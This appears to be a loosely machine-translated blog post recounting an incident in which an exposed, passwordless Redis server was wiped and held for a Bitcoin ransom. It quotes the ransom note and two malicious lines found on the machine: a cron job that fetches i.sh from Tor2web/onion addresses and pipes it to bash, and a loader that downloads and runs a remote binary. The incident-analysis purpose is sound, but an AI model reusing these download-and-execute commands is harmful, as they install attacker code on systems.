Shulou(Shulou.com)06/01 Report--

I was still shopping with my daughter-in-law when suddenly my colleague called to say that the redis library had been emptied.

So, my daughter-in-law said,"You really have a crow's mouth. In the morning, you even talked about how redis were promoted."

How did you know?"

What if you did it?

So he was invisibly carrying the pot again.

See ××× sister so anxious, comfort, remind colleagues to check, when did it happen, how big is the affected area?

however, sister xxx calmly said,"no, ah, the redis machine on our ucloud cloud business is forbidden to log in from outside the network."

All external ports 6379 are disabled.

Only local login, so I ask you have a password? Sister ××× said, easy to program development efficiency, intranet environment, naturally there is no password.

So, hurry back, log on to the machine, through the uclod console to confirm the next look.

I was fucking turned on by that idiot for a machine's redis extranet, and this machine

The ××× × ×× plane is completely isolated from other machines except for a program that monitors scheduling.

There are no programs directly associated with any business, except redis, and this machine cannot be connected to redis of other machines.

This machine doesn't have any classified core data.

And then you log in, and the machine appears.

Warning! Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail with your server IP Address and a Proof of Payment. Any eMail without your server IP Address and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! ! Mail:dbsecuritys@protonmail.com Bi BitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny

Encounter this matter, don't panic, obviously there is no backup of your data, there will be no data for the money.

It is also someone who pays, check out the Alibaba Cloud official article below for details.

Popular science:

Bitcoin unit price, at the time of writing, the price is 1BTC=44871.5 yuan

I'm going to go."

The habit of crotab -l first, read it, because fear of other commands have been tampered with.

54 * * * * (wget -qO- -U- U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh|| wg|| wget -qO- -U- U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh|| wg|| wget -qO- -U- U- https://ddgsdk6oou6znsdn.onion.pet/i.sh|| wg|| wget -qO- -U- U- https://ddgsdk6oou6znsdn.onion.ws/i.sh)| bas| Bash looked smart and directly used the dark net address.

I also tried to use onion routing to access the dark net through various settings, and found that access was not possible.

Google it is a complaint.

Disclaimer: Access to Google is required by clicking on the link below.

original address

Click here if you don't understand English

it turned out that there was more than one pit, so i remembered the sad story of hadoop yarn in the past.

I saw the article of Ali Cloud Prophet Community, so familiar and so strange.

immediately after confirming that the machine was damaged, it was discovered that it was around 3:00 on saturday.

Who the hell is doing this at this time? It's confusing, and even suspects whether it's a spy. Log in to the machine and check.

All logs,last messages, and anything you can imagine from November 3, 2018 on machines that have been redis deleted.

The only difference between this machine and the only one with redis ports turned on is:

"All the data belonging to the root home data directory of these redis library machines are there, and there is no warning.txt. "

The degree of destruction can be viewed in Alibaba Cloud's official website script (although the script displayed in our mission plan can only be downloaded as follows)

It reads as follows:

exec &>/dev/nullif ! ps -p $(< /tmp/.X11-lock); then x=/var/tmp/.x wget -qU- http://malwregafeg2fdjn.tor2web.me/.$ (uname -m) -O$x;chmod 777 $x;$x;rm -f $xfi

Delete library, run and blackmail, Redis blackmail incident broke out

But look at the documentation above and the machines that were directly compromised obviously the root home data directory was deleted.

The script doesn't show any intention of backing up to their database.

Look at them. They can block it in 10 seconds. You trash Ucloud. There's no movement.

It can be said that there is a world of difference between large factories and small factories.

It was too late to grieve and complain, and the daughter-in-law knew that important data had been transferred.

The next thing is to identify the victim side of the other redis machines.

And how to fix it.

According to colleagues, the deleted data of 5 machines is estimated to be directly flushdb all.

the only difference is that the file directories on all redis machines that have been purged are all there.

And there was no questionable progress, let alone mission planning.

If it is *** remote operation to clear the log, why do you have to choose z to clear only the diary of the day of clearing. And clear the login message of the day. Even so. People had to guard against whether it was a spy's act or not.

At the same time that the data has hope of recovery, the little wife's psychology is extremely unhappy because she did not go shopping well.

She was beautiful, skilled, and naturally popular. She was very aggrieved.

Although the authority of every person who leaves the company has been withdrawn, it has been obstructed by a machine that does not care, and by unknown people, causing harm to others and harming themselves. Obviously, people suspect the purpose of these people who are engaged in sabotage.

For fear of APT, I searched all the machines and all the key authentications.

Therefore, the author recommends jumpserver must strictly control the permissions, even if you delete the log and why not, you have the ability to delete my jump machine log.

After all, his authority was so great that several people were suspected of logging in. It's hard to locate.

If something goes wrong, most developers just care that I can't use it now. As for what happens, probably no one will care.

And in this case, the sense of self is that every mode of thinking is proceeding from a safe perspective. As a big data operation and maintenance, daughter-in-law starts from the perspective of operation and maintenance.

Therefore, there are still differences. For example, she will think that it is all spies. Of course, this probability is very high. He will analyze it from the present time. However, there is one most terrible thing in the direction of safety, that is APT.

I'm not in a hurry to mess with you, I'll bury it here, spend a long time to grab and analyze your business,*** your machine, after all, the enemy is in the dark, you are in the open.

If it's a mole, why write someone else's bitcoin address? therefore, all kinds of modus operandi are still full of suspicion.

What can be done is to change the springboard machine and do a minimum authorization. Finally, I suggested honey pots.

In fact, the most difficult thing to manage, whether it is managing people or technology, any cold zone, a cold zone that is easy to ignore, may become the entry point for gangsters to make waves.

And to be a technical person, there is a specialization in the profession, even if you are smart, you will never be absolutely safe.

Do you still remember a sentence given to me by the CTO who graduated from Tsinghua University when I first entered the workplace? Do you know how heavy the burden is on your shoulders?

My answer is yes: because I have root privileges...

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.